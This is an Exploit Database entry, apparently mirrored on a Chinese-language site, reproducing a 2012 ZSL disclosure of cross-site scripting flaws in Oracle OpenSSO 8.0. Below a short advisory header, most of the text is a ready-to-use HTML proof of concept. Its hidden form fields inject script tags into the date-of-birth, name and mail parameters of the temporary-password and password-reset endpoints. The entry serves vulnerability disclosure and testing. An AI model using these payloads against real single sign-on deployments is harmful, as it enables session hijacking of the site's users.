Oracle OpenSSO 8.0 – Multiple Cross-Site Scripting POST Injection Vulnerabilities

• Exploit Database
• 10 阅读

• 作者： LiquidWorm
  日期： 2012-11-29
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/23004/

• <!--
  
  Oracle OpenSSO 8.0 Multiple XSS POST Injection Vulnerabilities
  
  
  Vendor: Oracle Corporation
  Product web page: http://www.oracle.com
  Affected version: 8.0 Update 2 Patch3 Build 6.1 (2011-June-8 05:24)
  
  Summary: Oracle OpenSSO is a complete solution that provides Web
  access management, federated single sign-on and Web services
  security in a single, self-contained application.
  
  Desc: Oracle OpenSSO suffers from multiple cross-site scripting
  vulnerabilities when input passed via several parameters to several
  scripts is not properly sanitized before being returned to the user.
  This can be exploited to execute arbitrary HTML and script code in a
  user's browser session in context of an affected site.
  
  Tested on: Oracle-iPlanet-Web-Server/7.0
  
  
  Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  							
  
  Advisory ID: ZSL-2012-5114
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5114.php
  
  
  28.10.2012
  
  -->
  
  
  <html>
  <head>
  <title>Oracle OpenSSO 8.0 Multiple XSS POST Injection Vulnerabilities</title>
  </head>
  <body><center><br />
  
  <form method="POST" action="https://10.55.100.17/cmp_generate_tmp_pw.tiles">
  <input type="hidden" name="dob_Day" value='"><script>alert(1);</script>' />
  <input type="hidden" name="dob_Month" value='"><script>alert(2);</script>' />
  <input type="hidden" name="dob_Year" value='"><script>alert(3);</script>' />
  <input type="hidden" name="givenname" value='"><script>alert(4);</script>' />
  <input type="hidden" name="mail" value='"><script>alert(5);</script>' />
  <input type="hidden" name="sn" value='"><script>alert(6);</script>' />
  <input type="submit" value="#1" />
  </form>
  
  <br />
  
  <form method="POST" action="https://10.55.100.17/UI/Login?module=ResetPassword">
  <input type="hidden" name="dob_Day" value='"><script>alert(1);</script>' />
  <input type="hidden" name="dob_Month" value='"><script>alert(2);</script>' />
  <input type="hidden" name="dob_Year" value='"><script>alert(3);</script>' />
  <input type="hidden" name="givenname" value='"><script>alert(4);</script>' />
  <input type="hidden" name="mail" value='"><script>alert(5);</script>' />
  <input type="hidden" name="sn" value='"><script>alert(6);</script>' />
  <input type="hidden" name="x" value="41" />
  <input type="hidden" name="y" value="8" />
  <input type="submit" value="#2" />
  </form>
  
  </center></body>
  </html>